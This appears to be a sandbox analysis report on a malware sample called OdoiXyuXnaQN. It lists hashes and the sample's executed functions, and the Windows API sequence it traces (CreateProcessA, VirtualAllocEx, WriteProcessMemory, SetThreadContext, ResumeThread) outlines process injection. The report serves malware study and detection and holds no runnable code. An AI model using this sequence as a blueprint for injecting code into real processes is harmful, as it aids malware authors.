                                                                • API String ID: 0-2784955691
                                                                • Opcode ID: 4e44469f7655913b57164f0893c66fe860bb7af59f418754dbb10cc6d6a204b9
                                                                • Instruction ID: 568ffb0e6dd80299f3e229c963de7f185735b6f10cfb43bb7fd4f97fb269baa7
                                                                • Opcode Fuzzy Hash: 4e44469f7655913b57164f0893c66fe860bb7af59f418754dbb10cc6d6a204b9
                                                                • Instruction Fuzzy Hash: DBF2F675D00208DBDB14DFE0DD98ADEB7B9BF48304F10816AE506BB264EB746A4ACF54

                                                                Execution Graph

                                                                Execution Coverage:8.3%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:51
                                                                Total number of Limit Nodes:3
                                                                execution_graph 35031 561f360 35032 561f3a8 WriteProcessMemory 35031->35032 35034 561f3ff 35032->35034 35035 561f2a0 35036 561f2e0 VirtualAllocEx 35035->35036 35038 561f31d 35036->35038 35055 561f450 35056 561f49b ReadProcessMemory 35055->35056 35058 561f4df 35056->35058 35039 6f3fa30 35040 6f3fa75 Wow64SetThreadContext 35039->35040 35042 6f3fabd 35040->35042 35059 6f3f980 35060 6f3f9c0 ResumeThread 35059->35060 35062 6f3f9f1 35060->35062 35063 114db60 35064 114dba6 GetCurrentProcess 35063->35064 35066 114dbf1 35064->35066 35067 114dbf8 GetCurrentThread 35064->35067 35066->35067 35068 114dc35 GetCurrentProcess 35067->35068 35069 114dc2e 35067->35069 35070 114dc6b 35068->35070 35069->35068 35071 114dc93 GetCurrentThreadId 35070->35071 35072 114dcc4 35071->35072 35043 561f5e8 35044 561f671 CreateProcessA 35043->35044 35046 561f833 35044->35046 35046->35046 35047 114b7d8 35050 114b8c3 35047->35050 35048 114b7e7 35051 114b8e1 35050->35051 35052 114b904 35050->35052 35051->35052 35053 114bb08 GetModuleHandleW 35051->35053 35052->35048 35054 114bb35 35053->35054 35054->35048 35073 114dda8 DuplicateHandle 35074 114de3e 35073->35074 35075 1144668 35076 114467a 35075->35076 35077 1144686 35076->35077 35079 1144779 35076->35079 35080 114479d 35079->35080 35084 1144877 35080->35084 35088 1144888 35080->35088 35085 1144886 35084->35085 35086 114498c 35085->35086 35092 114454c 35085->35092 35090 11448af 35088->35090 35089 114498c 35090->35089 35091 114454c CreateActCtxA 35090->35091 35091->35089 35093 1145d18 CreateActCtxA 35092->35093 35095 1145ddb 35093->35095

                                                                Executed Functions

                                                                Function 0114DB50 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 0114DBDE
                                                                • GetCurrentThread.KERNEL32 ref: 0114DC1B
                                                                • GetCurrentProcess.KERNEL32 ref: 0114DC58
                                                                • GetCurrentThreadId.KERNEL32 ref: 0114DCB1
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1555309500.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_1140000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: e5a667cfee4501fb1d2a53a4a9740b4f47d74862a01638af41dde74bc7e93c55
                                                                • Instruction ID: 7061dfd84c1e3c749ff145e5f21540ab8ec918dc65421ff7e7d9ce6a582a0377
                                                                • Opcode Fuzzy Hash: e5a667cfee4501fb1d2a53a4a9740b4f47d74862a01638af41dde74bc7e93c55
                                                                • Instruction Fuzzy Hash: 5A5166B090074A8FEB08DFA9E948B9EBBF1FF88314F20845DD419A72A0D7749944CF65
                                                                Function 0114DB60 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 0114DBDE
                                                                • GetCurrentThread.KERNEL32 ref: 0114DC1B
                                                                • GetCurrentProcess.KERNEL32 ref: 0114DC58
                                                                • GetCurrentThreadId.KERNEL32 ref: 0114DCB1
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1555309500.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_1140000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: 21832b1fe73cfd82376d1615027be5252f7a676386defc031d2c1754434e019c
                                                                • Instruction ID: 74b34359141511e7c5a5a56cc97cae18d5ec98378993bcac54c533fdeeef97e0
                                                                • Opcode Fuzzy Hash: 21832b1fe73cfd82376d1615027be5252f7a676386defc031d2c1754434e019c
                                                                • Instruction Fuzzy Hash: A65148B090030A8FDB18DFA9D548B9EBBF5EF88714F20845DD409A7360D775A944CF65
                                                                Function 0561F5DC Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 208 561f5dc-561f67d 211 561f6b6-561f6d6 208->211 212 561f67f-561f689 208->212 217 561f6d8-561f6e2 211->217 218 561f70f-561f73e 211->218 212->211 213 561f68b-561f68d 212->213 215 561f6b0-561f6b3 213->215 216 561f68f-561f699 213->216 215->211 219 561f69b 216->219 220 561f69d-561f6ac 216->220 217->218 221 561f6e4-561f6e6 217->221 228 561f740-561f74a 218->228 229 561f777-561f831 CreateProcessA 218->229 219->220 220->220 222 561f6ae 220->222 223 561f709-561f70c 221->223 224 561f6e8-561f6f2 221->224 222->215 223->218 226 561f6f4 224->226 227 561f6f6-561f705 224->227 226->227 227->227 230 561f707 227->230 228->229 231 561f74c-561f74e 228->231 240 561f833-561f839 229->240 241 561f83a-561f8c0 229->241 230->223 233 561f771-561f774 231->233 234 561f750-561f75a 231->234 233->229 235 561f75c 234->235 236 561f75e-561f76d 234->236 235->236 236->236 237 561f76f 236->237 237->233 240->241 251 561f8d0-561f8d4 241->251 252 561f8c2-561f8c6 241->252 253 561f8e4-561f8e8 251->253 254 561f8d6-561f8da 251->254 252->251 255 561f8c8 252->255 257 561f8f8-561f8fc 253->257 258 561f8ea-561f8ee 253->258 254->253 256 561f8dc 254->256 255->251 256->253 260 561f90e-561f915 257->260 261 561f8fe-561f904 257->261 258->257 259 561f8f0 258->259 259->257 262 561f917-561f926 260->262 263 561f92c 260->263 261->260 262->263 264 561f92d 263->264 264->264
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0561F81E
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1570001213.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5610000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: e3ac4c277d4f6d9fa9e3a2b70ca9322f93837a754fd6e1e92afd4f46aeeeef93
                                                                • Instruction ID: 9c0447dab94e7c69bd5267171d4578b624e8ed8ad4eb8349ca334bf5875c8d9b
                                                                • Opcode Fuzzy Hash: e3ac4c277d4f6d9fa9e3a2b70ca9322f93837a754fd6e1e92afd4f46aeeeef93
                                                                • Instruction Fuzzy Hash: E7A18A71D003199FEB20DF68C844BEEFBB2BF48314F148569E809A7250DB759985CFA1
                                                                Function 0561F5E8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 266 561f5e8-561f67d 268 561f6b6-561f6d6 266->268 269 561f67f-561f689 266->269 274 561f6d8-561f6e2 268->274 275 561f70f-561f73e 268->275 269->268 270 561f68b-561f68d 269->270 272 561f6b0-561f6b3 270->272 273 561f68f-561f699 270->273 272->268 276 561f69b 273->276 277 561f69d-561f6ac 273->277 274->275 278 561f6e4-561f6e6 274->278 285 561f740-561f74a 275->285 286 561f777-561f831 CreateProcessA 275->286 276->277 277->277 279 561f6ae 277->279 280 561f709-561f70c 278->280 281 561f6e8-561f6f2 278->281 279->272 280->275 283 561f6f4 281->283 284 561f6f6-561f705 281->284 283->284 284->284 287 561f707 284->287 285->286 288 561f74c-561f74e 285->288 297 561f833-561f839 286->297 298 561f83a-561f8c0 286->298 287->280 290 561f771-561f774 288->290 291 561f750-561f75a 288->291 290->286 292 561f75c 291->292 293 561f75e-561f76d 291->293 292->293 293->293 294 561f76f 293->294 294->290 297->298 308 561f8d0-561f8d4 298->308 309 561f8c2-561f8c6 298->309 310 561f8e4-561f8e8 308->310 311 561f8d6-561f8da 308->311 309->308 312 561f8c8 309->312 314 561f8f8-561f8fc 310->314 315 561f8ea-561f8ee 310->315 311->310 313 561f8dc 311->313 312->308 313->310 317 561f90e-561f915 314->317 318 561f8fe-561f904 314->318 315->314 316 561f8f0 315->316 316->314 319 561f917-561f926 317->319 320 561f92c 317->320 318->317 319->320 321 561f92d 320->321 321->321
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0561F81E
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1570001213.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5610000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 39cb75869908f52d130a44944be0d574cd6f35b27417f51dec43df957bf8d373
                                                                • Instruction ID: 02af88829cc9531bd0a719feeb45ff4c4d9f52685023bf2d35f7c2d58e64b2ca
                                                                • Opcode Fuzzy Hash: 39cb75869908f52d130a44944be0d574cd6f35b27417f51dec43df957bf8d373
                                                                • Instruction Fuzzy Hash: 40917A71D003199FEB50DF68C844BEEFBB2BF48310F1485A9D809A7250DB759985CFA5
                                                                Function 0114B8C3 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 323 114b8c3-114b8df 324 114b8e1-114b8ee call 114b294 323->324 325 114b90b-114b90f 323->325 331 114b904 324->331 332 114b8f0 324->332 327 114b911-114b91b 325->327 328 114b923-114b964 325->328 327->328 334 114b966-114b96e 328->334 335 114b971-114b97f 328->335 331->325 380 114b8f6 call 114bb58 332->380 381 114b8f6 call 114bb68 332->381 334->335 336 114b981-114b986 335->336 337 114b9a3-114b9a5 335->337 339 114b991 336->339 340 114b988-114b98f call 114b2a0 336->340 342 114b9a8-114b9af 337->342 338 114b8fc-114b8fe 338->331 341 114ba40-114bb00 338->341 344 114b993-114b9a1 339->344 340->344 373 114bb02-114bb05 341->373 374 114bb08-114bb33 GetModuleHandleW 341->374 345 114b9b1-114b9b9 342->345 346 114b9bc-114b9c3 342->346 344->342 345->346 349 114b9c5-114b9cd 346->349 350 114b9d0-114b9d9 call 114b2b0 346->350 349->350 354 114b9e6-114b9eb 350->354 355 114b9db-114b9e3 350->355 356 114b9ed-114b9f4 354->356 357 114ba09-114ba0d 354->357 355->354 356->357 359 114b9f6-114ba06 call 114b2c0 call 114b2d0 356->359 378 114ba10 call 114be43 357->378 379 114ba10 call 114be68 357->379 359->357 362 114ba13-114ba16 364 114ba18-114ba36 362->364 365 114ba39-114ba3f 362->365 364->365 373->374 375 114bb35-114bb3b 374->375 376 114bb3c-114bb50 374->376 375->376 378->362 379->362 380->338 381->338
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0114BB26
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1555309500.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_1140000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: d2d350b3c18ba5756e3e424029fd3ec91b21c7d4629b4ca8546ad04000717228
                                                                • Instruction ID: f7e00c034f541a008996b81716cef2c3722858a505d9c5493d7d8380287061c6
                                                                • Opcode Fuzzy Hash: d2d350b3c18ba5756e3e424029fd3ec91b21c7d4629b4ca8546ad04000717228
                                                                • Instruction Fuzzy Hash: E68167B0A04B058FE729DF69D04176ABBF1FF88700F00892ED48AD7A41E774E905CB95
                                                                Function 01145D0D Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 382 1145d0d-1145dd9 CreateActCtxA 384 1145de2-1145e3c 382->384 385 1145ddb-1145de1 382->385 392 1145e3e-1145e41 384->392 393 1145e4b-1145e4f 384->393 385->384 392->393 394 1145e60 393->394 395 1145e51-1145e5d 393->395 397 1145e61 394->397 395->394 397->397
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 01145DC9
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1555309500.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_1140000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: ac0ac07022e1cd54f433a33b076bbf002be379b3674d9286b6216dceed1c45a0
                                                                • Instruction ID: 75405fe65fc99d74d9d11944ea8438e31887ea6dd722fb16c5945971a75bd176
                                                                • Opcode Fuzzy Hash: ac0ac07022e1cd54f433a33b076bbf002be379b3674d9286b6216dceed1c45a0
                                                                • Instruction Fuzzy Hash: 4341DFB1C00759CFEB24DFA9C84479EBBB2AF89704F20816AD508AB251DB756946CF50
                                                                Function 0114454C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 398 114454c-1145dd9 CreateActCtxA 401 1145de2-1145e3c 398->401 402 1145ddb-1145de1 398->402 409 1145e3e-1145e41 401->409 410 1145e4b-1145e4f 401->410 402->401 409->410 411 1145e60 410->411 412 1145e51-1145e5d 410->412 414 1145e61 411->414 412->411 414->414
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 01145DC9
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1555309500.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_1140000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 188dc01c52505acfeb50e9e1dfc969fabe69c04e7de9148f8009ba8fffc447c2
                                                                • Instruction ID: d1b841e9303c28e3ee77b2c57579460c82c3b8adb1eec012474b5cb600209eb6
                                                                • Opcode Fuzzy Hash: 188dc01c52505acfeb50e9e1dfc969fabe69c04e7de9148f8009ba8fffc447c2
                                                                • Instruction Fuzzy Hash: 5341CF71C00719CBEB28DFA9C84478EBBF6AF48704F20816AD508AB251DBB56946CF90
                                                                Function 0561F35A Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 415 561f35a-561f3ae 418 561f3b0-561f3bc 415->418 419 561f3be-561f3fd WriteProcessMemory 415->419 418->419 421 561f406-561f436 419->421 422 561f3ff-561f405 419->422 422->421
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0561F3F0
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1570001213.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5610000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 4fc2a99036c93bb4a71170806aeb7d6616ff48f61948805d674f924262d8614b
                                                                • Instruction ID: ff0e8c731d81c57c1bd498f4424b2c9f850f8375c581b0f85e7dbf3295c69a99
                                                                • Opcode Fuzzy Hash: 4fc2a99036c93bb4a71170806aeb7d6616ff48f61948805d674f924262d8614b
                                                                • Instruction Fuzzy Hash: 742146759003199FDB10CFAAC881BEEBBF5FF48320F148529E919A7380C7789945DBA4
                                                                Function 0561F360 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 426 561f360-561f3ae 428 561f3b0-561f3bc 426->428 429 561f3be-561f3fd WriteProcessMemory 426->429 428->429 431 561f406-561f436 429->431 432 561f3ff-561f405 429->432 432->431
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0561F3F0
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1570001213.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5610000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 4d00071f3e666906f4bf1e06754c85365532268407c6a2a5a340cface5d844da
                                                                • Instruction ID: 3d2a9646e96816814205355a1fa742545b3048cdb768b5c5c7ae0b1a6609003d
                                                                • Opcode Fuzzy Hash: 4d00071f3e666906f4bf1e06754c85365532268407c6a2a5a340cface5d844da
                                                                • Instruction Fuzzy Hash: D12125719003499FDB10DFAAC885BEEBBF5FF48310F14882AE959A7340C7789944DBA4
                                                                Function 0561F449 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 436 561f449-561f4dd ReadProcessMemory 440 561f4e6-561f516 436->440 441 561f4df-561f4e5 436->441 441->440
                                                                APIs
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0561F4D0
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1570001213.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5610000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: 7ec38c1a5344fc84f222f23c0a7a8ae6fb933f6a0c9034da351c115e8d0294d7
                                                                • Instruction ID: 343c64c6c3771076fdadff77ba245dc58c362f2c8f3aabd98ed8b2c50bd7ce26
                                                                • Opcode Fuzzy Hash: 7ec38c1a5344fc84f222f23c0a7a8ae6fb933f6a0c9034da351c115e8d0294d7
                                                                • Instruction Fuzzy Hash: D82127B1C003099FDB14DFAAC8807EEFBF5FF48210F50842AE959A7240C7389505DBA4
                                                                Function 06F3FA2A Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 445 6f3fa2a-6f3fa7b 447 6f3fa8b-6f3fa8e 445->447 448 6f3fa7d-6f3fa89 445->448 449 6f3fa95-6f3fabb Wow64SetThreadContext 447->449 448->447 450 6f3fac4-6f3faf4 449->450 451 6f3fabd-6f3fac3 449->451 451->450
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F3FAAE
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1571043617.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_6f30000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: 8b9a438058eebb83986afa9fb6b0fbca2edf3c445cf602cfc0c04b173f5f85e9
                                                                • Instruction ID: bfe93b4e1b54daf3c471534906cc27da50e629c44f73ce915e598387df6089b9
                                                                • Opcode Fuzzy Hash: 8b9a438058eebb83986afa9fb6b0fbca2edf3c445cf602cfc0c04b173f5f85e9
                                                                • Instruction Fuzzy Hash: 97213571D003098FDB14DFAAC4857EEBBF5AF88210F14842AD959A7380CB789945CFA0
                                                                Function 0114DDA0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 455 114dda0-114de3c DuplicateHandle 456 114de45-114de62 455->456 457 114de3e-114de44 455->457 457->456
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0114DE2F
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1555309500.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_1140000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: eb0655afef99001831b7a89f0439987d81db3cb6a9903591f43fb486cbf1202b
                                                                • Instruction ID: 5e2db797d8f55369f7b670c590b647c6e3bdf259a7233c07bea58c9b4a5eda97
                                                                • Opcode Fuzzy Hash: eb0655afef99001831b7a89f0439987d81db3cb6a9903591f43fb486cbf1202b
                                                                • Instruction Fuzzy Hash: E321E0B5D002599FDB10CFAAD584AEEBBF5FB48320F14842AE958A3250D378A951CF64
                                                                Function 0561F450 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0561F4D0
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1570001213.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5610000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: c266b7cdd47cbd133038184ca2adae8af08362e5cf81aa34b0a829135f2f1b02
                                                                • Instruction ID: 6e3e4dddf35dc0e5d6da4a667bbcb04489df02a7749afc1c72e92acafd545952
                                                                • Opcode Fuzzy Hash: c266b7cdd47cbd133038184ca2adae8af08362e5cf81aa34b0a829135f2f1b02
                                                                • Instruction Fuzzy Hash: A62116718003499FDB10DFAAC880BEEFBF5FF48310F548429E959A7240C7799500DBA4
                                                                Function 06F3FA30 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F3FAAE
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1571043617.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_6f30000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: f0384b8d4159fd79f03c6ac24d7374bcc6ac53de20da13b01879c7c9dac10cf9
                                                                • Instruction ID: b6f1ee4ffe51635f78f51583c9b841a8a7ebbac45c1dcbfff3eb1892c2d08028
                                                                • Opcode Fuzzy Hash: f0384b8d4159fd79f03c6ac24d7374bcc6ac53de20da13b01879c7c9dac10cf9
                                                                • Instruction Fuzzy Hash: 60214771D003098FDB10DFAAC4857EEBBF4EF88220F14842AD559A7340CB789945CFA4
                                                                Function 0114DDA8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0114DE2F
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1555309500.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_1140000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 4e9e79edfab50eb556dfcef9329ebf143212e979c97460278e24d8d7462a81be
                                                                • Instruction ID: 8b8a851e7d4278a545e18335092e23e31c46f788a4f901e47b1e1023e7e46c60
                                                                • Opcode Fuzzy Hash: 4e9e79edfab50eb556dfcef9329ebf143212e979c97460278e24d8d7462a81be
                                                                • Instruction Fuzzy Hash: E021E4B59002099FDF10CFAAD884ADEFBF9FB48710F14841AE918A3350D374A940CF64
                                                                Function 0561F298 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0561F30E
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1570001213.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5610000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: cd1541b88361ad058388245d2aaebf7410144c20970b39c47590a94c8f5356ab
                                                                • Instruction ID: f9cc3500c5507dc62f5248d1e262edf47ff9d026f747c6423826c0500a7e4f75
                                                                • Opcode Fuzzy Hash: cd1541b88361ad058388245d2aaebf7410144c20970b39c47590a94c8f5356ab
                                                                • Instruction Fuzzy Hash: A21167759002498FDB24DFAAC8447EEFBF6EF88310F14881AE919A7250C7359515DFA0
                                                                Function 0561F2A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0561F30E
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1570001213.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5610000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 103232c40c37ccef989ca3984ff6e7aa8e090b9d215b4b9c2707b562be8faf40
                                                                • Instruction ID: 796de095dac4e0b39d482c52ebb7fcb4417f18328bbb284ef7c7a73f55009fd4
                                                                • Opcode Fuzzy Hash: 103232c40c37ccef989ca3984ff6e7aa8e090b9d215b4b9c2707b562be8faf40
                                                                • Instruction Fuzzy Hash: 9E1137719003499FDB10DFAAC844BEEFBF5EF88720F148819E519A7250C7759540DFA4
                                                                Function 06F3F97A Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1571043617.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_6f30000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: ba45004b79355f224e4c70f3ca20437ff93be91bc4ba85d0d7dddd0288befd3c
                                                                • Instruction ID: 7579b9fc2bebf9c0355934c01e5cac2ed547936c02ddff383ae4c14928f05b6d
                                                                • Opcode Fuzzy Hash: ba45004b79355f224e4c70f3ca20437ff93be91bc4ba85d0d7dddd0288befd3c
                                                                • Instruction Fuzzy Hash: B1116A71C003498FDB20DFAAC8457EEFBF5AF88220F24841AD519A7340CB359505CFA0
                                                                Function 06F3F980 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1571043617.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_6f30000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 0683b3e02a18402dab1a4e3de827f3ef6715b1300e07b917b77062516d3452b5
                                                                • Instruction ID: fa0860d82fdc3b775c088912ee40e515471f17c2d2839a0eeec7fd658bf142a7
                                                                • Opcode Fuzzy Hash: 0683b3e02a18402dab1a4e3de827f3ef6715b1300e07b917b77062516d3452b5
